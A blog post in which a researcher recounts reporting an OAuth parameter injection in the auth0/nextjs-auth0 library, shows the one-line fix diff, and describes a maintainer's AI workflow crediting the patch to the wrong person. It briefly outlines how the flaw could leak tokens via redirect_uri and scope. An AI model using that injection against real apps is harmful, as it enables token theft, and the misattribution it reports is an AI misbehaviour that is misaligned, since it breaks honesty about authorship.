Okta's NextJS-0auth troubles

Summary

In October, I reported two security issues to Okta’s auth0/nextjs-auth0 project, here and here. The latter bug, an oauth parameter injection, allows for a range of types of abuse, like scoping tokens for unintended services, setting redirect_uri and scope to arbitrary values to leak tokens, and so on. The patch was simple enough, so I opened a PR: diff --git a/src/server/helpers/with-page-auth-required.ts b/src/server/helpers/with-page-auth-required.ts index 41af2dfe..f07046b8 100644 --- a/src/server/helpers/with-page-auth-required.ts +++ b/src/server/helpers/with-page-auth-required.ts @@ -196,7 +196,7 @@ export const appRouteHandlerFactory = : opts.returnTo; const { redirect } = await import("next/navigation.js"); redirect( - `${config.loginUrl}${opts.returnTo ? `?returnTo=${returnTo}` : ""}` + `${config.loginUrl}${opts.returnTo ? `?returnTo=${encodeURIComponent(returnTo)}` : ""}` ); } return handler(params); All’s well that ends well, right? Obviously, no. The PR, 3 weeks later, was closed by the maintainer, an auth0 (an Okta company) employee, with the following comment: This change is superseded by #2413. This was done to ensure that commits are signed. Orignal contribution history has been preserved. Hence closing this PR now. Hmm, let’s take a look at that PR: auth0/nextjs-auth0 #2413 Hmm. That patch looks familiar. And who is Simen Olsen? Pushing back on the attribution error, I replied: history has been preserved no it hasn’t. I don’t know who “Simen A. W. Olsen my@simen.io” is but it isn’t me and my commit here doesn’t reference that name or email address at all. Was it ai generated or something? Of course, the answer was: yes. It was AI slop. Hi @MegaManSec I sincerely apologize for this attribution error. Can confirm that an AI workflow was used to created the rebased commit, which got confused with OP details. I’ve added a correction to #2413, and will ensure the changelog is updated. Thank you for calling this out, we’ll make sure this doesn’t happen ag...